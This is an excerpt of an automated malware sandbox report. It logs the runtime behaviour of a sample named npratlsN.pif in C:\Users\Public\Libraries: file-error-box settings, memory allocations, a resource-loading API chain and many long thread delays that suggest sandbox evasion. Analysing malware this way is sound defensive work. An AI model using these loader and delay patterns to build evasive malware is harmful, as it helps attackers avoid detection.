          Source: C:\Users\Public\Libraries\npratlsN.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\Libraries\npratlsN.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\Libraries\npratlsN.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\Libraries\npratlsN.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\Libraries\npratlsN.pifProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\Libraries\npratlsN.pifProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\Libraries\npratlsN.pifProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\Libraries\npratlsN.pifProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\Libraries\npratlsN.pifProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\Libraries\npratlsN.pifProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\Libraries\npratlsN.pifProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\Libraries\npratlsN.pifProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\Libraries\npratlsN.pifProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\Libraries\npratlsN.pifProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\Libraries\npratlsN.pifProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\Libraries\npratlsN.pifProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\Libraries\npratlsN.pifProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\Libraries\npratlsN.pifProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\Libraries\npratlsN.pifProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\Libraries\npratlsN.pifProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\Libraries\npratlsN.pifProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\Libraries\npratlsN.pifProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\Libraries\npratlsN.pifProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\Libraries\npratlsN.pifProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\Libraries\npratlsN.pifProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\Libraries\npratlsN.pifProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\Libraries\npratlsN.pifProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\Libraries\npratlsN.pifProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\Libraries\npratlsN.pifProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\Libraries\npratlsN.pifProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\Libraries\npratlsN.pifProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\Libraries\npratlsN.pifProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\Libraries\npratlsN.pifProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\Libraries\npratlsN.pifProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\Libraries\npratlsN.pifProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\Libraries\npratlsN.pifProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\Libraries\npratlsN.pifProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\Libraries\npratlsN.pifProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\Libraries\npratlsN.pifProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\Libraries\npratlsN.pifProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\Libraries\npratlsN.pifProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\Libraries\npratlsN.pifProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\Libraries\npratlsN.pifProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\Libraries\npratlsN.pifProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\Libraries\npratlsN.pifProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\Libraries\npratlsN.pifProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\Libraries\npratlsN.pifProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\Libraries\npratlsN.pifProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\Libraries\npratlsN.pifProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\Libraries\npratlsN.pifProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\Libraries\npratlsN.pifProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\Libraries\npratlsN.pifProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\Libraries\npratlsN.pifProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\Libraries\npratlsN.pifProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\Libraries\npratlsN.pifProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\Libraries\npratlsN.pifProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\Libraries\npratlsN.pifProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\Libraries\npratlsN.pifProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\Libraries\npratlsN.pifProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\Libraries\npratlsN.pifProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\Libraries\npratlsN.pifProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\Libraries\npratlsN.pifProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\Libraries\npratlsN.pifProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\Libraries\npratlsN.pifProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\Libraries\npratlsN.pifProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\Libraries\npratlsN.pifProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\Libraries\npratlsN.pifProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\Libraries\npratlsN.pifProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\Libraries\npratlsN.pifProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\Libraries\npratlsN.pifProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\Libraries\npratlsN.pifProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\Libraries\npratlsN.pifProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\Libraries\npratlsN.pifProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\Libraries\npratlsN.pifProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\Libraries\npratlsN.pifProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\Libraries\npratlsN.pifProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\Libraries\npratlsN.pifProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\Libraries\npratlsN.pifProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\Libraries\npratlsN.pifProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\Libraries\npratlsN.pifProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\Libraries\npratlsN.pifProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\Libraries\npratlsN.pifProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\Libraries\npratlsN.pifProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\Libraries\npratlsN.pifProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\Libraries\npratlsN.pifProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\Libraries\npratlsN.pifProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\Libraries\npratlsN.pifProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\Libraries\npratlsN.pifProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\Libraries\npratlsN.pifProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\Libraries\npratlsN.pifProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\Libraries\npratlsN.pifProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\Libraries\npratlsN.pifProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\Libraries\npratlsN.pifProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\Libraries\npratlsN.pifProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\Libraries\npratlsN.pifProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\Libraries\npratlsN.pifProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\Libraries\npratlsN.pifProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\Libraries\npratlsN.pifProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\Libraries\npratlsN.pifProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\Libraries\npratlsN.pifProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\Libraries\npratlsN.pifProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\Libraries\npratlsN.pifProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\Libraries\npratlsN.pifProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\Libraries\npratlsN.pifProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\Libraries\npratlsN.pifProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\Libraries\npratlsN.pifProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\Libraries\npratlsN.pifProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\Libraries\npratlsN.pifProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\Libraries\npratlsN.pifProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\Libraries\npratlsN.pifProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\Libraries\npratlsN.pifProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\Libraries\npratlsN.pifProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\Libraries\npratlsN.pifProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\Libraries\npratlsN.pifProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\Libraries\npratlsN.pifProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\Libraries\npratlsN.pifProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\Libraries\npratlsN.pifProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\Libraries\npratlsN.pifProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\Libraries\npratlsN.pifProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\Libraries\npratlsN.pifProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\Libraries\npratlsN.pifProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\Libraries\npratlsN.pifProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\Libraries\npratlsN.pifProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\Libraries\npratlsN.pifProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\Libraries\npratlsN.pifMemory allocated: 285F0000 memory reserve | memory write watchJump to behavior
          Source: C:\Users\Public\Libraries\npratlsN.pifMemory allocated: 28AA0000 memory reserve | memory write watchJump to behavior
          Source: C:\Users\Public\Libraries\npratlsN.pifMemory allocated: 287A0000 memory reserve | memory write watchJump to behavior
          Source: C:\Users\Public\Libraries\npratlsN.pifMemory allocated: 33EF0000 memory reserve | memory write watch
          Source: C:\Users\Public\Libraries\npratlsN.pifMemory allocated: 34230000 memory reserve | memory write watch
          Source: C:\Users\Public\Libraries\npratlsN.pifMemory allocated: 34050000 memory reserve | memory write watch
          Source: C:\Users\Public\Libraries\npratlsN.pifMemory allocated: 1E9E0000 memory reserve | memory write watch
          Source: C:\Users\Public\Libraries\npratlsN.pifMemory allocated: 208E0000 memory reserve | memory write watch
          Source: C:\Users\Public\Libraries\npratlsN.pifMemory allocated: 20420000 memory reserve | memory write watch
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 8_2_004019F0 OleInitialize,_getenv,GetCurrentProcessId,CreateToolhelp32Snapshot,Module32First,CloseHandle,Module32Next,task_proc,Module32Next,CloseHandle,GetModuleHandleA,FindResourceA,LoadResource,LockResource,SizeofResource,_malloc,_memset,SizeofResource,_memset,FreeResource,_malloc,SizeofResource,_memset,LoadLibraryA,GetProcAddress,VariantInit,VariantInit,VariantInit,SafeArrayCreate,SafeArrayAccessData,SafeArrayUnaccessData,SafeArrayDestroy,SafeArrayCreateVector,VariantClear,VariantClear,VariantClear,8_2_004019F0
          Source: C:\Users\Public\Libraries\npratlsN.pifThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Users\Public\Libraries\npratlsN.pifThread delayed: delay time: 600000Jump to behavior
          Source: C:\Users\Public\Libraries\npratlsN.pifThread delayed: delay time: 599843Jump to behavior
          Source: C:\Users\Public\Libraries\npratlsN.pifThread delayed: delay time: 599734Jump to behavior
          Source: C:\Users\Public\Libraries\npratlsN.pifThread delayed: delay time: 599625Jump to behavior
          Source: C:\Users\Public\Libraries\npratlsN.pifThread delayed: delay time: 599515Jump to behavior
          Source: C:\Users\Public\Libraries\npratlsN.pifThread delayed: delay time: 599406Jump to behavior
          Source: C:\Users\Public\Libraries\npratlsN.pifThread delayed: delay time: 599296Jump to behavior
          Source: C:\Users\Public\Libraries\npratlsN.pifThread delayed: delay time: 599187Jump to behavior
          Source: C:\Users\Public\Libraries\npratlsN.pifThread delayed: delay time: 599078Jump to behavior
          Source: C:\Users\Public\Libraries\npratlsN.pifThread delayed: delay time: 598968Jump to behavior
          Source: C:\Users\Public\Libraries\npratlsN.pifThread delayed: delay time: 598859Jump to behavior
          Source: C:\Users\Public\Libraries\npratlsN.pifThread delayed: delay time: 598750Jump to behavior
          Source: C:\Users\Public\Libraries\npratlsN.pifThread delayed: delay time: 598640Jump to behavior
          Source: C:\Users\Public\Libraries\npratlsN.pifThread delayed: delay time: 598531Jump to behavior
          Source: C:\Users\Public\Libraries\npratlsN.pifThread delayed: delay time: 598421Jump to behavior
          Source: C:\Users\Public\Libraries\npratlsN.pifThread delayed: delay time: 598311Jump to behavior
          Source: C:\Users\Public\Libraries\npratlsN.pifThread delayed: delay time: 598203Jump to behavior
          Source: C:\Users\Public\Libraries\npratlsN.pifThread delayed: delay time: 598093Jump to behavior
          Source: C:\Users\Public\Libraries\npratlsN.pifThread delayed: delay time: 597984Jump to behavior
          Source: C:\Users\Public\Libraries\npratlsN.pifThread delayed: delay time: 597874Jump to behavior
          Source: C:\Users\Public\Libraries\npratlsN.pifThread delayed: delay time: 597764Jump to behavior
          Source: C:\Users\Public\Libraries\npratlsN.pifThread delayed: delay time: 597656Jump to behavior
          Source: C:\Users\Public\Libraries\npratlsN.pifThread delayed: delay time: 597541Jump to behavior
          Source: C:\Users\Public\Libraries\npratlsN.pifThread delayed: delay time: 597420Jump to behavior
          Source: C:\Users\Public\Libraries\npratlsN.pifThread delayed: delay time: 597312Jump to behavior
          Source: C:\Users\Public\Libraries\npratlsN.pifThread delayed: delay time: 597203Jump to behavior
          Source: C:\Users\Public\Libraries\npratlsN.pifThread delayed: delay time: 597093Jump to behavior
          Source: C:\Users\Public\Libraries\npratlsN.pifThread delayed: delay time: 596984Jump to behavior
          Source: C:\Users\Public\Libraries\npratlsN.pifThread delayed: delay time: 596875Jump to behavior
          Source: C:\Users\Public\Libraries\npratlsN.pifThread delayed: delay time: 596765Jump to behavior
          Source: C:\Users\Public\Libraries\npratlsN.pifThread delayed: delay time: 596656Jump to behavior
          Source: C:\Users\Public\Libraries\npratlsN.pifThread delayed: delay time: 596546Jump to behavior
          Source: C:\Users\Public\Libraries\npratlsN.pifThread delayed: delay time: 596437Jump to behavior
          Source: C:\Users\Public\Libraries\npratlsN.pifThread delayed: delay time: 596327Jump to behavior
          Source: C:\Users\Public\Libraries\npratlsN.pifThread delayed: delay time: 596218Jump to behavior
          Source: C:\Users\Public\Libraries\npratlsN.pifThread delayed: delay time: 596109Jump to behavior
          Source: C:\Users\Public\Libraries\npratlsN.pifThread delayed: delay time: 595999Jump to behavior
          Source: C:\Users\Public\Libraries\npratlsN.pifThread delayed: delay time: 595890Jump to behavior
          Source: C:\Users\Public\Libraries\npratlsN.pifThread delayed: delay time: 595779Jump to behavior
          Source: C:\Users\Public\Libraries\npratlsN.pifThread delayed: delay time: 595669Jump to behavior
          Source: C:\Users\Public\Libraries\npratlsN.pifThread delayed: delay time: 595555Jump to behavior
          Source: C:\Users\Public\Libraries\npratlsN.pifThread delayed: delay time: 595435Jump to behavior
          Source: C:\Users\Public\Libraries\npratlsN.pifThread delayed: delay time: 595321Jump to behavior
          Source: C:\Users\Public\Libraries\npratlsN.pifThread delayed: delay time: 595209Jump to behavior
          Source: C:\Users\Public\Libraries\npratlsN.pifThread delayed: delay time: 595072Jump to behavior
          Source: C:\Users\Public\Libraries\npratlsN.pifThread delayed: delay time: 594960Jump to behavior
          Source: C:\Users\Public\Libraries\npratlsN.pifThread delayed: delay time: 594781Jump to behavior
          Source: C:\Users\Public\Libraries\npratlsN.pifThread delayed: delay time: 594525Jump to behavior
          Source: C:\Users\Public\Libraries\npratlsN.pifThread delayed: delay time: 594404Jump to behavior
          Source: C:\Users\Public\Libraries\npratlsN.pifThread delayed: delay time: 594287Jump to behavior
          Source: C:\Users\Public\Libraries\npratlsN.pifThread delayed: delay time: 594159Jump to behavior
          Source: C:\Users\Public\Libraries\npratlsN.pifThread delayed: delay time: 594022Jump to behavior
          Source: C:\Users\Public\Libraries\npratlsN.pifThread delayed: delay time: 593824Jump to behavior
          Source: C:\Users\Public\Libraries\npratlsN.pifThread delayed: delay time: 922337203685477
          Source: C:\Users\Public\Libraries\npratlsN.pifThread delayed: delay time: 600000
          Source: C:\Users\Public\Libraries\npratlsN.pifThread delayed: delay time: 599890
          Source: C:\Users\Public\Libraries\npratlsN.pifThread delayed: delay time: 599782
          Source: C:\Users\Public\Libraries\npratlsN.pifThread delayed: delay time: 599657
          Source: C:\Users\Public\Libraries\npratlsN.pifThread delayed: delay time: 599545
          Source: C:\Users\Public\Libraries\npratlsN.pifThread delayed: delay time: 599434
          Source: C:\Users\Public\Libraries\npratlsN.pifThread delayed: delay time: 599326
          Source: C:\Users\Public\Libraries\npratlsN.pifThread delayed: delay time: 599210
          Source: C:\Users\Public\Libraries\npratlsN.pifThread delayed: delay time: 599104
          Source: C:\Users\Public\Libraries\npratlsN.pifThread delayed: delay time: 598990
          Source: C:\Users\Public\Libraries\npratlsN.pifThread delayed: delay time: 598841
          Source: C:\Users\Public\Libraries\npratlsN.pifThread delayed: delay time: 598697
          Source: C:\Users\Public\Libraries\npratlsN.pifThread delayed: delay time: 598389
          Source: C:\Users\Public\Libraries\npratlsN.pifThread delayed: delay time: 598218
          Source: C:\Users\Public\Libraries\npratlsN.pifThread delayed: delay time: 598085
          Source: C:\Users\Public\Libraries\npratlsN.pifThread delayed: delay time: 597897
          Source: C:\Users\Public\Libraries\npratlsN.pifThread delayed: delay time: 597751
          Source: C:\Users\Public\Libraries\npratlsN.pifThread delayed: delay time: 597591
          Source: C:\Users\Public\Libraries\npratlsN.pifThread delayed: delay time: 597425
          Source: C:\Users\Public\Libraries\npratlsN.pifThread delayed: delay time: 597305
          Source: C:\Users\Public\Libraries\npratlsN.pifThread delayed: delay time: 597141
          Source: C:\Users\Public\Libraries\npratlsN.pifThread delayed: delay time: 597002
          Source: C:\Users\Public\Libraries\npratlsN.pifThread delayed: delay time: 596828
          Source: C:\Users\Public\Libraries\npratlsN.pifThread delayed: delay time: 596703
          Source: C:\Users\Public\Libraries\npratlsN.pifThread delayed: delay time: 596551
          Source: C:\Users\Public\Libraries\npratlsN.pifThread delayed: delay time: 596429
          Source: C:\Users\Public\Libraries\npratlsN.pifThread delayed: delay time: 596258
          Source: C:\Users\Public\Libraries\npratlsN.pifThread delayed: delay time: 596138
          Source: C:\Users\Public\Libraries\npratlsN.pifThread delayed: delay time: 596031
          Source: C:\Users\Public\Libraries\npratlsN.pifThread delayed: delay time: 595913
          Source: C:\Users\Public\Libraries\npratlsN.pifThread delayed: delay time: 595774
          Source: C:\Users\Public\Libraries\npratlsN.pifThread delayed: delay time: 595668
          Source: C:\Users\Public\Libraries\npratlsN.pifThread delayed: delay time: 595559
          Source: C:\Users\Public\Libraries\npratlsN.pifThread delayed: delay time: 595450
          Source: C:\Users\Public\Libraries\npratlsN.pifThread delayed: delay time: 595340
          Source: C:\Users\Public\Libraries\npratlsN.pifThread delayed: delay time: 595231
          Source: C:\Users\Public\Libraries\npratlsN.pifThread delayed: delay time: 595121
          Source: C:\Users\Public\Libraries\npratlsN.pifThread delayed: delay time: 595012
          Source: C:\Users\Public\Libraries\npratlsN.pifThread delayed: delay time: 594903
          Source: C:\Users\Public\Libraries\npratlsN.pifThread delayed: delay time: 594793
          Source: C:\Users\Public\Libraries\npratlsN.pifThread delayed: delay time: 594684
          Source: C:\Users\Public\Libraries\npratlsN.pifThread delayed: delay time: 594564
          Source: C:\Users\Public\Libraries\npratlsN.pifThread delayed: delay time: 594450
          Source: C:\Users\Public\Libraries\npratlsN.pifThread delayed: delay time: 594340
          Source: C:\Users\Public\Libraries\npratlsN.pifThread delayed: delay time: 594231
          Source: C:\Users\Public\Libraries\npratlsN.pifThread delayed: delay time: 594121
          Source: C:\Users\Public\Libraries\npratlsN.pifThread delayed: delay time: 594012
          Source: C:\Users\Public\Libraries\npratlsN.pifThread delayed: delay time: 593902
          Source: C:\Users\Public\Libraries\npratlsN.pifThread delayed: delay time: 593792
          Source: C:\Users\Public\Libraries\npratlsN.pifThread delayed: delay time: 593684
          Source: C:\Users\Public\Libraries\npratlsN.pifThread delayed: delay time: 593573
          Source: C:\Users\Public\Libraries\npratlsN.pifThread delayed: delay time: 593410
          Source: C:\Users\Public\Libraries\npratlsN.pifThread delayed: delay time: 593293
          Source: C:\Users\Public\Libraries\npratlsN.pifThread delayed: delay time: 593184
          Source: C:\Users\Public\Libraries\npratlsN.pifThread delayed: delay time: 593075
          Source: C:\Users\Public\Libraries\npratlsN.pifThread delayed: delay time: 592965
          Source: C:\Users\Public\Libraries\npratlsN.pifThread delayed: delay time: 592844
          Source: C:\Users\Public\Libraries\npratlsN.pifThread delayed: delay time: 592731
          Source: C:\Users\Public\Libraries\npratlsN.pifThread delayed: delay time: 592621
          Source: C:\Users\Public\Libraries\npratlsN.pifThread delayed: delay time: 592512
          Source: C:\Users\Public\Libraries\npratlsN.pifThread delayed: delay time: 592403
          Source: C:\Users\Public\Libraries\npratlsN.pifThread delayed: delay time: 592286
          Source: C:\Users\Public\Libraries\npratlsN.pifThread delayed: delay time: 922337203685477
          Source: C:\Users\Public\Libraries\npratlsN.pifThread delayed: delay time: 600000
          Source: C:\Users\Public\Libraries\npratlsN.pifThread delayed: delay time: 599875
          Source: C:\Users\Public\Libraries\npratlsN.pifThread delayed: delay time: 599766
          Source: C:\Users\Public\Libraries\npratlsN.pifThread delayed: delay time: 599641
          Source: C:\Users\Public\Libraries\npratlsN.pifThread delayed: delay time: 599531
          Source: C:\Users\Public\Libraries\npratlsN.pifThread delayed: delay time: 599422
          Source: C:\Users\Public\Libraries\npratlsN.pifThread delayed: delay time: 599313
          Source: C:\Users\Public\Libraries\npratlsN.pifThread delayed: delay time: 599188
          Source: C:\Users\Public\Libraries\npratlsN.pifThread delayed: delay time: 599058
          Source: C:\Users\Public\Libraries\npratlsN.pifThread delayed: delay time: 598932
          Source: C:\Users\Public\Libraries\npratlsN.pifThread delayed: delay time: 598821
          Source: C:\Users\Public\Libraries\npratlsN.pifThread delayed: delay time: 598653
          Source: C:\Users\Public\Libraries\npratlsN.pifThread delayed: delay time: 598328
          Source: C:\Users\Public\Libraries\npratlsN.pifThread delayed: delay time: 598219
          Source: C:\Users\Public\Libraries\npratlsN.pifThread delayed: delay time: 598109
          Source: C:\Users\Public\Libraries\npratlsN.pifThread delayed: delay time: 598000
          Source: C:\Users\Public\Libraries\npratlsN.pifThread delayed: delay time: 597890
          Source: C:\Users\Public\Libraries\npratlsN.pifThread delayed: delay time: 597781
          Source: C:\Users\Public\Libraries\npratlsN.pifThread delayed: delay time: 597672
          Source: C:\Users\Public\Libraries\npratlsN.pifThread delayed: delay time: 597563
          Source: C:\Users\Public\Libraries\npratlsN.pifThread delayed: delay time: 597453
          Source: C:\Users\Public\Libraries\npratlsN.pifThread delayed: delay time: 597314
          Source: C:\Users\Public\Libraries\npratlsN.pifThread delayed: delay time: 597188
          Source: C:\Users\Public\Libraries\npratlsN.pifThread delayed: delay time: 597078
          Source: C:\Users\Public\Libraries\npratlsN.pifThread delayed: delay time: 596969
          Source: C:\Users\Public\Libraries\npratlsN.pifThread delayed: delay time: 596859
          Source: C:\Users\Public\Libraries\npratlsN.pifThread delayed: delay time: 596750
          Source: C:\Users\Public\Libraries\npratlsN.pifThread delayed: delay time: 596638
          Source: C:\Users\Public\Libraries\npratlsN.pifThread delayed: delay time: 596516
          Source: C:\Users\Public\Libraries\npratlsN.pifThread delayed: delay time: 596406
          Source: C:\Users\Public\Libraries\npratlsN.pifThread delayed: delay time: 596287
          Source: C:\Users\Public\Libraries\npratlsN.pifThread delayed: delay time: 596156
          Source: C:\Users\Public\Libraries\npratlsN.pifThread delayed: delay time: 596016
          Source: C:\Users\Public\Libraries\npratlsN.pifThread delayed: delay time: 595688
          Source: C:\Users\Public\Libraries\npratlsN.pifThread delayed: delay time: 595577
          Source: C:\Users\Public\Libraries\npratlsN.pifThread delayed: delay time: 595468
          Source: C:\Users\Public\Libraries\npratlsN.pifThread delayed: delay time: 595359
          Source: C:\Users\Public\Libraries\npratlsN.pifThread delayed: delay time: 595250
          Source: C:\Users\Public\Libraries\npratlsN.pifThread delayed: delay time: 595141
          Source: C:\Users\Public\Libraries\npratlsN.pifThread delayed: delay time: 595031
          Source: C:\Users\Public\Libraries\npratlsN.pifThread delayed: delay time: 594922
          Source: C:\Users\Public\Libraries\npratlsN.pifThread delayed: delay time: 594812
          Source: C:\Users\Public\Libraries\npratlsN.pifThread delayed: delay time: 594703
          Source: C:\Users\Public\Libraries\npratlsN.pifThread delayed: delay time: 594594
          Source: C:\Users\Public\Libraries\npratlsN.pifThread delayed: delay time: 594469
          Source: C:\Users\Public\Libraries\npratlsN.pifThread delayed: delay time: 594359
          Source: C:\Users\Public\Libraries\npratlsN.pifThread delayed: delay time: 594249
          Source: C:\Users\Public\Libraries\npratlsN.pifThread delayed: delay time: 594141
          Source: C:\Users\Public\Libraries\npratlsN.pifThread delayed: delay time: 594031
          Source: C:\Users\Public\Libraries\npratlsN.pifThread delayed: delay time: 593922
          Source: C:\Users\Public\Libraries\npratlsN.pifThread delayed: delay time: 593812
          Source: C:\Users\Public\Libraries\npratlsN.pifThread delayed: delay time: 593703
          Source: C:\Users\Public\Libraries\npratlsN.pifWindow / User API: threadDelayed 9210Jump to behavior
          Source: C:\Users\Public\Libraries\npratlsN.pifWindow / User API: threadDelayed 633Jump to behavior
          Source: C:\Users\Public\Libraries\npratlsN.pifWindow / User API: threadDelayed 3504
          Source: C:\Users\Public\Libraries\npratlsN.pifWindow / User API: threadDelayed 6281
          Source: C:\Users\Public\Libraries\npratlsN.pifWindow / User API: threadDelayed 5515
          Source: C:\Users\Public\Libraries\npratlsN.pifWindow / User API: threadDelayed 4320
          Source: C:\Users\Public\Libraries\npratlsN.pif TID: 7024Thread sleep count: 34 > 30Jump to behavior
          Source: C:\Users\Public\Libraries\npratlsN.pif TID: 7024Thread sleep time: -31359464925306218s >= -30000sJump to behavior
          Source: C:\Users\Public\Libraries\npratlsN.pif TID: 7024Thread sleep time: -600000s >= -30000sJump to behavior
          Source: C:\Users\Public\Libraries\npratlsN.pif TID: 6332Thread sleep count: 9210 > 30Jump to behavior
          Source: C:\Users\Public\Libraries\npratlsN.pif TID: 7024Thread sleep time: -599843s >= -30000sJump to behavior
          Source: C:\Users\Public\Libraries\npratlsN.pif TID: 6332Thread sleep count: 633 > 30Jump to behavior
          Source: C:\Users\Public\Libraries\npratlsN.pif TID: 7024Thread sleep time: -599734s >= -30000sJump to behavior
          Source: C:\Users\Public\Libraries\npratlsN.pif TID: 7024Thread sleep time: -599625s >= -30000sJump to behavior
          Source: C:\Users\Public\Libraries\npratlsN.pif TID: 7024Thread sleep time: -599515s >= -30000sJump to behavior
          Source: C:\Users\Public\Libraries\npratlsN.pif TID: 7024Thread sleep time: -599406s >= -30000sJump to behavior
          Source: C:\Users\Public\Libraries\npratlsN.pif TID: 7024Thread sleep time: -599296s >= -30000sJump to behavior
          Source: C:\Users\Public\Libraries\npratlsN.pif TID: 7024Thread sleep time: -599187s >= -30000sJump to behavior
          Source: C:\Users\Public\Libraries\npratlsN.pif TID: 7024Thread sleep time: -599078s >= -30000sJump to behavior
          Source: C:\Users\Public\Libraries\npratlsN.pif TID: 7024Thread sleep time: -598968s >= -30000sJump to behavior
          Source: C:\Users\Public\Libraries\npratlsN.pif TID: 7024Thread sleep time: -598859s >= -30000sJump to behavior
